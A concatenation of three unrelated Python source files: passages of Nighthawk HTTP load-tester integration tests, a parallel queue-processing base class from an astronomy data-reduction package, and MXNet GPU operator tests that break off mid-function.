["nighthawk/test/integration/configurations/nighthawk_https_origin.yaml"]) def test_https_h2_tls_context_configuration(https_test_server_fixture): """Test that specifying tls cipher suites works with the h2 pool.""" _do_tls_configuration_test(https_test_server_fixture, "--tls-context", use_h2=True) @pytest.mark.parametrize('server_config', ["nighthawk/test/integration/configurations/nighthawk_https_origin.yaml"]) def test_https_h2_transport_socket_configuration(https_test_server_fixture): """Test that specifying tls cipher suites via transport socket works with the h2 pool.""" _do_tls_configuration_test(https_test_server_fixture, "--transport-socket", use_h2=True) @pytest.mark.parametrize('server_config', ["nighthawk/test/integration/configurations/nighthawk_https_origin.yaml"]) def test_https_prefetching(https_test_server_fixture): """Test we prefetch connections. We test for 1 second at 1 rps, which should result in 1 connection max without prefetching. However, we specify 50 connections and the prefetching flag, so we ought to see 50 http1 connections created. """ parsed_json, _ = https_test_server_fixture.runNighthawkClient([ "--duration 1", "--rps 1", "--prefetch-connections", "--connections 50", https_test_server_fixture.getTestServerRootUri() ]) counters = https_test_server_fixture.getNighthawkCounterMapFromJson(parsed_json) asserts.assertCounterEqual(counters, "upstream_cx_http1_total", 50) @pytest.mark.parametrize('server_config', ["nighthawk/test/integration/configurations/nighthawk_https_origin.yaml"]) def test_https_log_verbosity(https_test_server_fixture): """Test that the specified log verbosity level is respected. This tests for a sentinel we know is only right when the level is set to 'trace'. """ # TODO(oschaaf): this is kind of fragile. Can we improve? 
trace_level_sentinel = "nighthawk_service_zone" _, logs = https_test_server_fixture.runNighthawkClient( ["--duration 1", "--rps 1", "-v debug", https_test_server_fixture.getTestServerRootUri()]) asserts.assertNotIn(trace_level_sentinel, logs) _, logs = https_test_server_fixture.runNighthawkClient( ["--duration 1", "--rps 1", "-v trace", https_test_server_fixture.getTestServerRootUri()]) asserts.assertIn(trace_level_sentinel, logs) def test_dotted_output_format(http_test_server_fixture): """Test that we get the dotted string output format when requested, and ensure we get latency percentiles.""" output, _ = http_test_server_fixture.runNighthawkClient([ "--duration 1", "--rps 10", "--output-format dotted", http_test_server_fixture.getTestServerRootUri() ], as_json=False) asserts.assertIn("global.benchmark_http_client.request_to_response.permilles-500.microseconds", output) # TODO(oschaaf): add percentiles to the gold testing in the C++ output formatter # once the fortio formatter has landed (https://github.com/envoyproxy/nighthawk/pull/168) def test_cli_output_format(http_test_server_fixture): """Test that we observe latency percentiles with CLI output.""" output, _ = http_test_server_fixture.runNighthawkClient( ["--duration 1", "--rps 10", http_test_server_fixture.getTestServerRootUri()], as_json=False) asserts.assertIn("Initiation to completion", output) asserts.assertIn("Percentile", output) @pytest.mark.parametrize( 'filter_configs', ["{}", "{static_delay: \"0.01s\"}", "{emit_previous_request_delta_in_response_header: \"aa\"}"]) def test_request_body_gets_transmitted(http_test_server_fixture, filter_configs): """Test request body transmission handling code for our extensions. Ensure that the number of bytes we request for the request body gets reflected in the upstream connection transmitted bytes counter for h1 and h2. 
""" def check_upload_expectations(fixture, parsed_json, expected_transmitted_bytes, expected_received_bytes): counters = fixture.getNighthawkCounterMapFromJson(parsed_json) asserts.assertCounterGreaterEqual(counters, "upstream_cx_tx_bytes_total", expected_transmitted_bytes) server_stats = fixture.getTestServerStatisticsJson() # Server side expectations start failing with larger upload sizes asserts.assertGreaterEqual( fixture.getServerStatFromJson(server_stats, "http.ingress_http.downstream_cx_rx_bytes_total"), expected_received_bytes) # TODO(#531): The dynamic-delay extension hangs unless we lower the request entity body size. upload_bytes = 1024 * 1024 if "static_delay" in filter_configs else 1024 * 1024 * 3 requests = 10 args = [ http_test_server_fixture.getTestServerRootUri(), "--duration", "100", "--rps", "100", "--request-body-size", str(upload_bytes), "--termination-predicate", "benchmark.http_2xx:%s" % str(requests), "--connections", "1", "--request-method", "POST", "--max-active-requests", "1", "--request-header", "x-nighthawk-test-server-config:%s" % filter_configs ] # Test we transmit the expected amount of bytes with H1 parsed_json, _ = http_test_server_fixture.runNighthawkClient(args) check_upload_expectations(http_test_server_fixture, parsed_json, upload_bytes * requests, upload_bytes * requests) # Test we transmit the expected amount of bytes with H2 args.append("--h2") parsed_json, _ = http_test_server_fixture.runNighthawkClient(args) # We didn't reset the server in between, so our expectation for received bytes on the server side is raised. check_upload_expectations(http_test_server_fixture, parsed_json, upload_bytes * requests, upload_bytes * requests * 2) def test_http_h1_termination_predicate(http_test_server_fixture): """Test with a termination predicate. Should result in successfull execution, with 10 successfull requests. We would expect 25 based on rps and duration. 
""" parsed_json, _ = http_test_server_fixture.runNighthawkClient([ http_test_server_fixture.getTestServerRootUri(), "--duration", "5", "--rps", "500", "--connections", "1", "--termination-predicate", "benchmark.http_2xx:9" ]) counters = http_test_server_fixture.getNighthawkCounterMapFromJson(parsed_json) asserts.assertCounterEqual(counters, "benchmark.http_2xx", 10) def test_http_h1_failure_predicate(http_test_server_fixture): """Test with a failure predicate. Should result in failing execution, with 10 successfull requests. """ parsed_json, _ = http_test_server_fixture.runNighthawkClient([ http_test_server_fixture.getTestServerRootUri(), "--duration", "5", "--rps", "500", "--connections", "1", "--failure-predicate", "benchmark.http_2xx:0" ], expect_failure=True) counters = http_test_server_fixture.getNighthawkCounterMapFromJson(parsed_json) asserts.assertCounterEqual(counters, "benchmark.http_2xx", 1) def test_bad_arg_error_messages(http_test_server_fixture): """Test arguments that pass proto validation, but are found to be no good nonetheless, result in reasonable error messages.""" _, err = http_test_server_fixture.runNighthawkClient( [http_test_server_fixture.getTestServerRootUri(), "--termination-predicate ", "a:a"], expect_failure=True, as_json=False) assert "Bad argument: Termination predicate 'a:a' has an out of range threshold." in err def test_multiple_backends_http_h1(multi_http_test_server_fixture): """Test that we can load-test multiple backends on http. Runs the CLI configured to use plain HTTP/1 against multiple test servers, and sanity checks statistics from both client and server. 
""" nighthawk_client_args = [ "--multi-target-path", "/", "--duration", "100", "--termination-predicate", "benchmark.http_2xx:24" ] for uri in multi_http_test_server_fixture.getAllTestServerRootUris(): nighthawk_client_args.append("--multi-target-endpoint") nighthawk_client_args.append(uri.replace("http://", "").replace("/", "")) parsed_json, stderr = multi_http_test_server_fixture.runNighthawkClient(nighthawk_client_args) counters = multi_http_test_server_fixture.getNighthawkCounterMapFromJson(parsed_json) asserts.assertCounterEqual(counters, "benchmark.http_2xx", 25) asserts.assertCounterEqual(counters, "upstream_cx_http1_total", 3) asserts.assertCounterGreater(counters, "upstream_cx_rx_bytes_total", 0) asserts.assertCounterEqual(counters, "upstream_cx_total", 3) asserts.assertCounterGreater(counters, "upstream_cx_tx_bytes_total", 0) asserts.assertCounterEqual(counters, "upstream_rq_pending_total", 3) asserts.assertCounterEqual(counters, "upstream_rq_total", 25) asserts.assertCounterEqual(counters, "default.total_match_count", 3) for parsed_server_json in multi_http_test_server_fixture.getAllTestServerStatisticsJsons(): single_2xx = multi_http_test_server_fixture.getServerStatFromJson( parsed_server_json, "http.ingress_http.downstream_rq_2xx") # Confirm that each backend receives some traffic asserts.assertGreaterEqual(single_2xx, 1) @pytest.mark.parametrize('server_config', ["nighthawk/test/integration/configurations/nighthawk_https_origin.yaml"]) def test_multiple_backends_https_h1(multi_https_test_server_fixture): """Test that we can load-test multiple backends on https. Runs the CLI configured to use HTTP/1 with TLS against multiple test servers, and sanity checks statistics from both client and server. 
""" nighthawk_client_args = [ "--multi-target-use-https", "--multi-target-path", "/", "--duration", "100", "--termination-predicate", "benchmark.http_2xx:24" ] for uri in multi_https_test_server_fixture.getAllTestServerRootUris(): nighthawk_client_args.append("--multi-target-endpoint") nighthawk_client_args.append(uri.replace("https://", "").replace("/", "")) parsed_json, stderr = multi_https_test_server_fixture.runNighthawkClient(nighthawk_client_args) counters = multi_https_test_server_fixture.getNighthawkCounterMapFromJson(parsed_json) asserts.assertCounterEqual(counters, "benchmark.http_2xx", 25) asserts.assertCounterEqual(counters, "upstream_cx_http1_total", 3) asserts.assertCounterGreater(counters, "upstream_cx_rx_bytes_total", 0) asserts.assertCounterEqual(counters, "upstream_cx_total", 3) asserts.assertCounterGreater(counters, "upstream_cx_tx_bytes_total", 0) asserts.assertCounterEqual(counters, "upstream_rq_pending_total", 3) asserts.assertCounterEqual(counters, "upstream_rq_total", 25) asserts.assertCounterEqual(counters, "default.total_match_count", 3) total_2xx = 0 for parsed_server_json in multi_https_test_server_fixture.getAllTestServerStatisticsJsons(): single_2xx = multi_https_test_server_fixture.getServerStatFromJson( parsed_server_json, "http.ingress_http.downstream_rq_2xx") asserts.assertBetweenInclusive(single_2xx, 8, 9) total_2xx += single_2xx asserts.assertBetweenInclusive(total_2xx, 24, 25) @pytest.mark.parametrize('server_config', ["nighthawk/test/integration/configurations/sni_origin.yaml"]) def test_https_h1_sni(https_test_server_fixture): """Test that SNI indication works on https/h1.""" # Verify success when we set the right host parsed_json, _ = https_test_server_fixture.runNighthawkClient([ https_test_server_fixture.getTestServerRootUri(), "--rps", "100", "--duration", "100", "--termination-predicate", "benchmark.http_2xx:2", "--request-header", "host: sni.com" ]) counters = 
https_test_server_fixture.getNighthawkCounterMapFromJson(parsed_json)
  asserts.assertCounterGreaterEqual(counters, "benchmark.http_2xx", 1)
  asserts.assertCounterGreaterEqual(counters, "upstream_cx_http1_total", 1)
  asserts.assertCounterGreaterEqual(counters, "ssl.handshake", 1)

  # Verify failure when we set no host (will get plain http)
  parsed_json, _ = https_test_server_fixture.runNighthawkClient(
      [https_test_server_fixture.getTestServerRootUri(), "--rps", "20", "--duration", "100"],
      expect_failure=True)

  # Verify success when we use plain http and don't request the sni host
  parsed_json, _ = https_test_server_fixture.runNighthawkClient([
      https_test_server_fixture.getTestServerRootUri().replace("https://", "http://"), "--rps",
      "100", "--duration", "20", "--termination-predicate", "benchmark.http_2xx:2"
  ],
                                                                expect_failure=False)
  counters = https_test_server_fixture.getNighthawkCounterMapFromJson(parsed_json)
  asserts.assertCounterGreaterEqual(counters, "benchmark.http_2xx", 1)
  asserts.assertCounterGreaterEqual(counters, "upstream_cx_http1_total", 1)
  # Plain http must not have performed a TLS handshake.
  asserts.assertNotIn("ssl.handshake", counters)


@pytest.mark.parametrize('server_config',
                         ["nighthawk/test/integration/configurations/sni_origin.yaml"])
def test_https_h2_sni(https_test_server_fixture):
  """Tests that SNI indication works on https/h2."""
  # Verify success when we set the right host via the :authority: pseudo-header.
  parsed_json, _ = https_test_server_fixture.runNighthawkClient([
      https_test_server_fixture.getTestServerRootUri(), "--rps", "100", "--duration", "100",
      "--termination-predicate", "benchmark.http_2xx:2", "--request-header",
      ":authority: sni.com", "--h2"
  ])
  counters = https_test_server_fixture.getNighthawkCounterMapFromJson(parsed_json)
  asserts.assertCounterGreaterEqual(counters, "benchmark.http_2xx", 1)
  asserts.assertCounterGreaterEqual(counters, "upstream_cx_http2_total", 1)
  asserts.assertCounterEqual(counters, "ssl.handshake", 1)

  # Verify success when we set the right host via the plain "host" header.
  parsed_json, _ = https_test_server_fixture.runNighthawkClient([
      https_test_server_fixture.getTestServerRootUri(), "--rps", "100", "--duration", "100",
      "--termination-predicate", "benchmark.http_2xx:2", "--request-header", "host: sni.com",
      "--h2"
  ])
  counters = https_test_server_fixture.getNighthawkCounterMapFromJson(parsed_json)
  asserts.assertCounterGreaterEqual(counters, "benchmark.http_2xx", 1)
  asserts.assertCounterGreaterEqual(counters, "upstream_cx_http2_total", 1)
  asserts.assertCounterEqual(counters, "ssl.handshake", 1)

  # Verify failure when we set no host (will get plain http)
  parsed_json, _ = https_test_server_fixture.runNighthawkClient([
      https_test_server_fixture.getTestServerRootUri(), "--rps", "100", "--duration", "100",
      "--h2"
  ],
                                                                expect_failure=True)

  # Verify failure when we provide both host and :authority: (will get plain http)
  parsed_json, _ = https_test_server_fixture.runNighthawkClient([
      https_test_server_fixture.getTestServerRootUri(), "--rps", "100", "--duration", "100",
      "--h2", "--request-header", "host: sni.com", "--request-header", ":authority: sni.com"
  ],
                                                                expect_failure=True)


@pytest.fixture(scope="function", params=[1, 25])
def qps_parameterization_fixture(request):
  """Yield queries per second values to iterate test parameterization on."""
  param = request.param
  yield param


@pytest.fixture(scope="function", params=[5, 10])
def duration_parameterization_fixture(request):
  """Yield duration values to iterate test parameterization on."""
  param = request.param
  yield param


@pytest.mark.skipif(utility.isSanitizerRun(), reason="Unstable in sanitizer runs")
def test_http_request_release_timing(http_test_server_fixture, qps_parameterization_fixture,
                                     duration_parameterization_fixture):
  """Test latency-sample-, query- and reply- counts in various configurations.

  Runs the client across the cross-product of qps / duration fixture values and two
  concurrency levels, then checks that the histograms and counters contain at least
  the number of samples implied by rps * concurrency * elapsed-seconds.
  """
  for concurrency in [1, 2]:
    parsed_json, _ = http_test_server_fixture.runNighthawkClient([
        http_test_server_fixture.getTestServerRootUri(), "--duration",
        str(duration_parameterization_fixture), "--rps",
        str(qps_parameterization_fixture), "--concurrency",
        str(concurrency)
    ])

    global_histograms = http_test_server_fixture.getNighthawkGlobalHistogramsbyIdFromJson(
        parsed_json)
    counters = http_test_server_fixture.getNighthawkCounterMapFromJson(parsed_json)
    global_result = http_test_server_fixture.getGlobalResults(parsed_json)
    actual_duration = utility.get_execution_duration_from_global_result_json(global_result)
    # Ensure Nighthawk managed to execute for at least some time.
    assert actual_duration >= 1

    # The actual duration is a float, flooring it here allows us to use
    # the GreaterEqual matchers below.
    total_requests = qps_parameterization_fixture * concurrency * math.floor(actual_duration)
    asserts.assertGreaterEqual(
        int(global_histograms["benchmark_http_client.request_to_response"]["count"]),
        total_requests)
    asserts.assertGreaterEqual(
        int(global_histograms["benchmark_http_client.queue_to_connect"]["count"]),
        total_requests)
    asserts.assertGreaterEqual(
        int(global_histograms["benchmark_http_client.latency_2xx"]["count"]), total_requests)
    asserts.assertCounterGreaterEqual(counters, "benchmark.http_2xx", (total_requests))
    # Give system resources some time to recover after the last execution.
    time.sleep(2)


def _send_sigterm(process):
  # Sleep for a while, under tsan the client needs a lot of time
  # to start up. 10 seconds has been determined to work through
  # empirical observation.
  time.sleep(10)
  process.terminate()


def test_cancellation_with_infinite_duration(http_test_server_fixture):
  """Test that we can use signals to cancel execution."""
  args = [
      http_test_server_fixture.nighthawk_client_path, "--concurrency", "2",
      http_test_server_fixture.getTestServerRootUri(), "--no-duration", "--output-format", "json"
  ]
  client_process = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
  # Deliver SIGTERM from a background thread once the client has had time to start.
  Thread(target=(lambda: _send_sigterm(client_process))).start()
  stdout, stderr = client_process.communicate()
  client_process.wait()
  output = stdout.decode('utf-8')
  asserts.assertEqual(client_process.returncode, 0)
  parsed_json = json.loads(output)
  counters = http_test_server_fixture.getNighthawkCounterMapFromJson(parsed_json)
  # One graceful stop per worker (--concurrency 2).
  asserts.assertCounterEqual(counters, "graceful_stop_requested", 2)
  asserts.assertCounterGreaterEqual(counters, "benchmark.http_2xx", 1)


@pytest.mark.parametrize('server_config', [
    "nighthawk/test/integration/configurations/nighthawk_http_origin.yaml",
    "nighthawk/test/integration/configurations/nighthawk_track_timings.yaml"
])
def test_http_h1_response_header_latency_tracking(http_test_server_fixture, server_config):
  """Test emission and tracking of response header latencies.

  Run the CLI configured to track latencies delivered by response header from the test-server.
  Ensure that the origin_latency_statistic histogram receives the correct number of inputs.
  """
  parsed_json, _ = http_test_server_fixture.runNighthawkClient([
      http_test_server_fixture.getTestServerRootUri(), "--connections", "1", "--rps", "100",
      "--duration", "100", "--termination-predicate", "benchmark.http_2xx:99",
      "--latency-response-header-name", "x-origin-request-receipt-delta"
  ])
  global_histograms = http_test_server_fixture.getNighthawkGlobalHistogramsbyIdFromJson(
      parsed_json)
  asserts.assertEqual(int(global_histograms["benchmark_http_client.latency_2xx"]["count"]), 100)
  # Verify behavior is correct both with and without the timing filter enabled.
  expected_histogram_count = 99 if "nighthawk_track_timings.yaml" in server_config else 0
  asserts.assertEqual(
      int(global_histograms["benchmark_http_client.origin_latency_statistic"]["count"]),
      expected_histogram_count)


def _run_client_with_args(args):
  # Thin wrapper: run the nighthawk_client binary with the given argument string.
  return utility.run_binary_with_args("nighthawk_client", args)


def test_client_help():
  """Test that passing --help behaves as expected."""
  (exit_code, output) = _run_client_with_args("--help")
  asserts.assertEqual(exit_code, 0)
  asserts.assertIn("USAGE", output)


def test_client_bad_arg():
  """Test that passing bad arguments behaves as expected."""
  (exit_code, output) = _run_client_with_args("127.0.0.1 --foo")
  asserts.assertEqual(exit_code, 1)
  asserts.assertIn("PARSE ERROR: Argument: --foo", output)


def test_client_cli_bad_uri(http_test_server_fixture):
  """Test that passing a bad URI to the client results in nice behavior."""
  _, err = http_test_server_fixture.runNighthawkClient(["http://http://foo"],
                                                       expect_failure=True,
                                                       as_json=False)
  assert "Invalid target URI" in err


@pytest.mark.parametrize('server_config',
                         ["nighthawk/test/integration/configurations/nighthawk_https_origin.yaml"])
def test_drain(https_test_server_fixture):
  """Test that the pool drain timeout is effective, and we terminate in a timely fashion.

  Sets up the test server to delay replies 100 seconds. Our execution will only last 20 seconds,
  so we expect to observe no replies. Termination should be cut short by the drain timeout, which
  means that we should have results in approximately execution duration + drain timeout = 25
  seconds. (the pool drain timeout is hard coded to 5 seconds as of writing this). If drain
  timeout is reached, a message will be logged to the user.
  """
  parsed_json, logs = https_test_server_fixture.runNighthawkClient([
      https_test_server_fixture.getTestServerRootUri(), "--rps", "100", "--duration", "20",
      "--request-header", "x-nighthawk-test-server-config: {static_delay: \"100s\"}"
  ])
  counters = https_test_server_fixture.getNighthawkCounterMapFromJson(parsed_json)
  asserts.assertCounterGreaterEqual(counters, "upstream_cx_http1_total", 1)
  # Replies are delayed 100s, so no 2xx should have been observed within 20s of execution.
  asserts.assertNotIn("benchmark.http_2xx", counters)
  asserts.assertIn("Wait for the connection pool drain timed out, proceeding to hard shutdown",
                   logs)
# ---- base.py ----
""" Code to provide a base class for processing objects in a queue in parallel. Features: - Generic use case for processing objects in a queue. - Can run using either a process pool or thread pool. - Handles and logs uncaught exceptions. - Minimal CPU downtime. """ import gc import time import atexit import queue from functools import partial from threading import Thread from contextlib import suppress from multiprocessing import Pool, Event from multiprocessing import JoinableQueue as Queue from abc import ABC, abstractmethod from panoptes.utils.time import CountdownTimer from huntsman.drp.base import HuntsmanBase from huntsman.drp.collection import ExposureCollection, CalibCollection def _wrap_process_func(i, func): """ Get objects from the input queue and process them, putting results in output queue. Args: i (int): Dummy variable used to start the pool. func (Function): Function used to process the object. """ global exposure_collection global input_queue global output_queue global stop_event logger = exposure_collection.logger while True: # Check if we should break out of the loop if stop_event.is_set(): break # Get an object from the queue try: obj = input_queue.get(timeout=1) except queue.Empty: continue # Process the object success = True try: func(obj, calib_collection=calib_collection, exposure_collection=exposure_collection) except Exception as err: logger.error(f"Exception while processing {obj}: {err!r}") success = False # Apparently putting exceptions into the queue causes problems (hanging on get) # So return a boolean value to indicate success result = {"obj": obj, "success": success} # Put the result in the output queue output_queue.put(result) # Explicit garbage collection gc.collect() def _init_pool(function, config, in_queue, out_queue, stp_event): """ Initialise the process pool. This function is required because we need to share the queue objects with each process and they cannot be parsed directly. 
Additionally create Collection objects here so that they do not need to be recreated for each procesed object. Args: function (Function): The wrapped processing function. config (dict): The config. in_queue (Queue): The input queue. out_queue (Queue): The output queue. stp_queue (Queue): The queue used to send the stop messages. """ # Declare global objects global exposure_collection global calib_collection global input_queue global output_queue global stop_event # Assign global objects input_queue = in_queue output_queue = out_queue stop_event = stp_event exposure_collection = ExposureCollection(config=config) calib_collection = CalibCollection(config=config) class ProcessQueue(HuntsmanBase, ABC): """ Abstract class to process queued objects in parallel. """ _pool_class = Pool # Allow class overrides def __init__(self, exposure_collection=None, calib_collection=None, queue_interval=300, status_interval=30, nproc=None, directory=None, *args, **kwargs): """ Args: queue_interval (float): The amout of time to sleep in between checking for new files to process in seconds. Default 300s. status_interval (float, optional): Sleep for this long between status reports. Default 60s. directory (str): The top level directory to watch for new files, so they can be added to the relevant datatable. nproc (int): The number of processes to use. If None (default), will check the config item `screener.nproc` with a default value of 1. *args, **kwargs: Parsed to HuntsmanBase initialiser. 
""" super().__init__(*args, **kwargs) self.nproc = 1 if not nproc else int(nproc) # Setup the exposure collections if exposure_collection is None: exposure_collection = ExposureCollection(config=self.config, logger=self.logger) # Setup the collections self.exposure_collection = ExposureCollection(config=self.config, logger=self.logger) # Sleep intervals self._queue_interval = queue_interval self._status_interval = status_interval # Make queues self._input_queue = Queue() self._output_queue = Queue() # Setup threads self._status_thread = Thread(target=self._async_monitor_status) self._queue_thread = Thread(target=self._async_queue_objects) self._process_thread = Thread(target=self._async_process_objects) self._threads = [self._status_thread, self._queue_thread, self._process_thread] # Starting values self._n_processed = 0 self._n_failed = 0 self._total_queued = 0 self._stop_event = Event() self._queued_objs = set() # Set to keep track of what objects are in the queue atexit.register(self.stop) # This gets called when python is quit def __str__(self): return str(self.__class__.__name__) @property def is_running(self): """ Check if the screener is running. Returns: bool: True if running, else False. """ return all([t.is_alive() for t in self._threads]) @property def status(self): """ Return a status dictionary. NOTE: status call is not thread-safe, so minor inconsistencies are possible in the numbers. Returns: dict: The status dictionary. 
""" n_processed = self._n_processed n_input = self._input_queue.qsize() n_output = self._output_queue.qsize() total_queued = self._total_queued pending = total_queued - n_processed - n_input - n_output status = {"status_thread": self._status_thread.is_alive(), "queue_thread": self._queue_thread.is_alive(), "process_thread": self._process_thread.is_alive(), "processed": n_processed, "total_queued": total_queued, "pending": pending, "failed": self._n_failed, "input_queue": n_input, "output_queue": n_output} return status @property def threads_stopping(self): """ Return True if threads should stop, else False. """ return self._stop_event.is_set() @threads_stopping.setter def threads_stopping(self, value): """ Set to True if threads should stop, else False. """ if value: self._stop_event.set() else: self._stop_event.clear() def start(self): """ Start the service. """ self.logger.info(f"Starting {self}.") self.threads_stopping = False for thread in self._threads: thread.start() def stop(self, blocking=True): """ Stop the file ingestor. Args: blocking (bool, optional): If True (default), blocks until all threads have joined. """ self.logger.info(f"Stopping {self}.") self.threads_stopping = True if blocking: for thread in self._threads: with suppress(RuntimeError): thread.join() self.logger.info(f"{self} stopped.") @abstractmethod def _get_objs(self): """ Return a list of objects to process. Returned objects do not have to be unique and may already exist in the queue. This is an abstract method and must be overridden by subclasses. """ pass def _async_monitor_status(self): """ Report the status on a regular interval. 
""" self.logger.debug("Starting status thread.") while True: if self.threads_stopping: self.logger.debug("Stopping status thread.") break # Get the current status status = self.status self.logger.info(f"{self} status: {status}") if not self.is_running: self.logger.warning(f"{self} is not running.") # Sleep before reporting status again timer = CountdownTimer(duration=self._status_interval) while not timer.expired(): if self.threads_stopping: break time.sleep(1) self.logger.debug("Status thread stopped.") def _async_queue_objects(self): """ Add new objs to the queue. """ self.logger.debug("Starting queue thread.") while True: if self.threads_stopping: self.logger.debug("Stopping queue thread.") break objs_to_process = self._get_objs() # Update files to process self.logger.debug("Adding new objects to queue.") for obj in objs_to_process: if obj not in self._queued_objs: # Make sure queue objs are unique # Add the object to the set of objects currently being processed self._queued_objs.add(obj) # Queue the object for processing self._input_queue.put(obj) # Increment the total number of objects we have queued self._total_queued += 1 timer = CountdownTimer(duration=self._queue_interval) while not timer.expired(): if self.threads_stopping: break time.sleep(1) self.logger.debug("Queue thread stopped.") def _async_process_objects(self, process_func): """ Continually process objects in the queue. This method is indended to be overridden with all arguments provided by the subclass. Args: process_func (Function): Univariate function to parallelise. 
""" self.logger.debug(f"Starting processing with {self.nproc} processes.") wrapped_func = partial(_wrap_process_func, func=process_func) pool_init_args = (wrapped_func, self.config, self._input_queue, self._output_queue, self._stop_event) # Avoid Pool context manager to make multiprocessing coverage work pool = self._pool_class(self.nproc, initializer=_init_pool, initargs=pool_init_args) try: pool.map_async(wrapped_func, range(self.nproc)) while not (self.threads_stopping and self._output_queue.empty()): self._process_results() self.logger.debug("Terminating process pool.") finally: pool.close() pool.join() self.logger.debug("Process thread stopped.") def _process_results(self): """ Process the results in the output queue. """ try: result = self._output_queue.get(timeout=1) except queue.Empty: return obj = result["obj"] success = result["success"] if hasattr(self, "_on_failure"): try: self._on_failure(obj) except Exception as err: self.logger.error(f"Error in on_failure callback for {obj}: {err!r}") success_or_fail = "success" if success else "fail" self.logger.info(f"Finished processing {obj} ({success_or_fail}).") self._n_processed += 1 if not success: self._n_failed += 1 self._input_queue.task_done() self._output_queue.task_done() self._queued_objs.remove(obj)
# ---- test_operator_gpu.py ----
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements.  See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership.  The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License.  You may obtain a copy of the License at
#
#   http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied.  See the License for the
# specific language governing permissions and limitations
# under the License.

from __future__ import print_function
import sys
import os
import time
import multiprocessing as mp
import unittest
import mxnet as mx
import numpy as np
import unittest  # NOTE(review): duplicate import of unittest; harmless but redundant.
from nose.tools import assert_raises
from mxnet.test_utils import check_consistency, set_default_context, assert_almost_equal
from mxnet.base import MXNetError
from mxnet import autograd
from numpy.testing import assert_allclose

# Make the CPU unittest directory importable so its tests re-run against the GPU context.
curr_path = os.path.dirname(os.path.abspath(os.path.expanduser(__file__)))
sys.path.insert(0, os.path.join(curr_path, '../unittest'))
from common import setup_module, with_seed, teardown, assert_raises_cudnn_disabled
from test_operator import *
from test_optimizer import *
from test_random import *
from test_exc_handling import *
#from test_rnn import *
from test_sparse_ndarray import *
from test_sparse_operator import *
from test_ndarray import *

set_default_context(mx.gpu(0))
# These CPU-only tests are removed from the GPU run.
del test_support_vector_machine_l1_svm  # noqa
del test_support_vector_machine_l2_svm  # noqa


def check_countsketch(in_dim, out_dim, n):
    # Compare the count_sketch operator against a hand-computed numpy reference,
    # both forward and backward.
    data = mx.sym.Variable("data")
    h = mx.sym.Variable("h")
    s = mx.sym.Variable("s")
    sym = mx.sym.contrib.count_sketch(data=data, h=h, s=s, name='countsketch', out_dim=out_dim)
    shape = [(n, in_dim), (1, in_dim), (1, in_dim)]  # shape of input x, hash h and hash s

    arr = [mx.nd.empty(shape[i]) for i in range(3)]
    arr_grad = [mx.nd.empty(shape[i]) for i in range(3)]
    x = np.random.uniform(-10, 10, shape[0])
    arr[0][:] = x                           # input x
    h = np.random.randint(0, out_dim, shape[1])
    arr[1][:] = h                           # hash h
    s = np.random.randint(0, 2, shape[2]) * 2 - np.ones(shape[2])  # random signs in {-1, +1}
    arr[2][:] = s                           # hash s
    locations = {"data": x, "h": h, "s": s}
    # Reference forward: each input column is routed to output bucket h[col], signed by s[col].
    a = np.zeros((n, out_dim))
    temp = np.multiply(x, s)
    for num_sample in np.arange(0, n):
        for idx in np.arange(0, in_dim):
            a[num_sample][h[0][idx]] += temp[num_sample][idx]
    check_symbolic_forward(sym, locations, [a], rtol=1e-3, atol=1e-5, ctx=mx.gpu(0))
    out_grad = mx.nd.empty((n, out_dim))
    out_grad[:] = np.random.normal(-3, 3, (n, out_dim))
    # Reference backward: gradient is gathered back through the same hash and sign.
    a = np.zeros((n, in_dim))
    for j in np.arange(0, n):
        for i in np.arange(0, in_dim):
            a[j, i] = out_grad.asnumpy()[j, h[0, i]] * s[0, i]
    check_symbolic_backward(sym, locations, [out_grad], [a], rtol=1e-3, atol=1e-5, ctx=mx.gpu(0))


@with_seed()
def test_countsketch():
    # Randomize dimensions within safe bounds and delegate to the checker.
    minindim = 40
    maxindim = 100
    minoutdim = 5
    maxoutdim = 30
    maxn = 200
    in_dim = np.random.randint(minindim, maxindim)
    out_dim = np.random.randint(minoutdim, maxoutdim)
    n = np.random.randint(1, maxn)
    check_countsketch(in_dim, out_dim, n)


def check_ifft(shape):
    # The ifft op packs complex values as interleaved (real, imag) pairs along the last
    # axis, so the input shape's last dim is doubled (and first made even if odd).
    shape_old = shape
    if len(shape) == 2:
        if shape[1] % 2 != 0:
            lst = list(shape)
            lst[1] = lst[1] * 2
            shape = tuple(lst)
            shape_old = shape
        shape = (shape[0], shape[1] * 2)
    if len(shape) == 4:
        if shape[3] % 2 != 0:
            lst = list(shape)
            lst[3] = lst[3] * 2
            shape = tuple(lst)
            shape_old = shape
        shape = (shape[0], shape[1], shape[2], shape[3] * 2)
    sym = mx.sym.contrib.ifft(name='ifft', compute_size=128)
    init = [np.random.normal(size=shape, scale=1.0)]
    arr_grad = [mx.nd.empty(shape)]
    ctx_list = [{'ctx': mx.gpu(0), 'ifft_data': shape, 'type_dict': {'ifft_data': np.float32}}]
    exe_list = [sym.simple_bind(args_grad=arr_grad, **ctx) for ctx in ctx_list]

    for exe in exe_list:
        for arr, iarr in zip(exe.arg_arrays, init):
            arr[:] = iarr.astype(arr.dtype)
    # forward
    for exe in exe_list:
        exe.forward(is_train=True)
    out1 = [exe.outputs[0].asnumpy() for exe in exe_list]

    # Rebuild the complex input from the interleaved layout and compare against numpy.
    # NOTE: the op output is unnormalized, hence the division by the transform length.
    if len(shape) == 2:
        init_complex = np.zeros(shape_old, dtype=np.complex64)
        for i in range(0, shape_old[1]):
            init_complex.real[:, i] = init[0][:, 2 * i]
            init_complex.imag[:, i] = init[0][:, 2 * i + 1]
        a = np.fft.ifft(init_complex, n=None, axis=-1, norm=None)
        assert_almost_equal(a.real, out1[0] / shape_old[1], rtol=1e-3, atol=1e-12)

    if len(shape) == 4:
        init_complex = np.zeros(shape_old, dtype=np.complex64)
        for i in range(0, shape_old[3]):
            init_complex.real[:, :, :, i] = init[0][:, :, :, 2 * i]
            init_complex.imag[:, :, :, i] = init[0][:, :, :, 2 * i + 1]
        a = np.fft.ifft(init_complex, n=None, axis=-1, norm=None)
